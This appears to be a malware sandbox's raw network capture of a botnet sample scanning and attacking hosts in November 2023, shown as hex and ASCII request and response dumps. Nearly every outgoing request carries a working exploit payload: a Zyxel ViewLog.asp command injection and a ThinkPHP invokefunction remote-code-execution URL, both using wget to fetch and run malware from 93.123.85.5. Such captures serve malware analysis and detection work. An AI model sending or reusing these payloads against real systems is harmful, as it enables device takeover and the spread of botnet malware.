                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              329192.168.2.235701062.29.30.838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.197252035 CET7445OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              33192.168.2.234066062.29.57.2148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:12.536175966 CET1649OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              330192.168.2.233435694.120.23.768080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.199481010 CET7445OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              331192.168.2.2360652112.223.119.2080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.209520102 CET7446OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:00.534482956 CET7456INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Content-Length: 675
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 30 64 30 64 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 20 7d 0a 64 69 76 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 34 70 78 3b 20 77 69 64 74 68 3a 35 30 30 70 78 3b 20 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 61 75 74 6f 20 30 3b 20 70 61 64 64 69 6e 67 3a 35 30 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 30 38 30 38 30 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 38 70 78 20 31 35 70 78 20 32 30 70 78 20 23 34 30 34 30 34 30 20 7d 0a 68 31 20 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 20 7d 0a 70 20 7b 20 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 61 30 61 30 66 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 34 30 30 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>400 - Bad Request</title><style type="text/css">body { background-color:#d0d0d0; font-family:sans-serif }div { background-color:#f8f8f8; letter-spacing:4px; width:500px; margin:100px auto 0; padding:50px; border-radius:10px; border:1px solid #808080; box-shadow:8px 15px 20px #404040 }h1 { margin:0; font-size:22px; font-weight:normal }p { margin:10px 0 0 0; padding-top:2px; font-size:14px; color:#606060; border-top:1px solid #a0a0ff; text-align:right; font-weight:bold }</style></head><body><div><h1>Bad Request</h1><p>400</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              332192.168.2.233368695.86.83.1918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.216605902 CET7447OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              333192.168.2.234188694.1.67.1878080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.416119099 CET7449OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              334192.168.2.235892631.136.32.288080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.450756073 CET7450OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.453562975 CET7578OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.437237024 CET7814OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:07.596755028 CET8332OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.531601906 CET9341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:31.401566982 CET11253OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.141355991 CET15292OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              335192.168.2.233539031.136.249.2328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.451611042 CET7451OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.456495047 CET7578OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:03.469228983 CET7814OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:07.596746922 CET8331OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.787619114 CET9429OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:31.913604021 CET11295OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.189187050 CET15544OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              336192.168.2.233863494.123.184.918080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.481458902 CET7451OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              337192.168.2.234415494.121.116.1108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.482718945 CET7452OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              338192.168.2.233535295.101.178.25180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.517194986 CET7453OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:00.824409962 CET7550INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 34 37 61 37 62 35 63 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 30 26 23 34 36 3b 32 32 39 34 33 64 64 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a47a7b5c&#46;1699910340&#46;22943dd8</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              339192.168.2.234034295.100.231.25480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:00.532773972 CET7455OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:00.854598999 CET7555INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:00 GMT
                                                              Connection: close
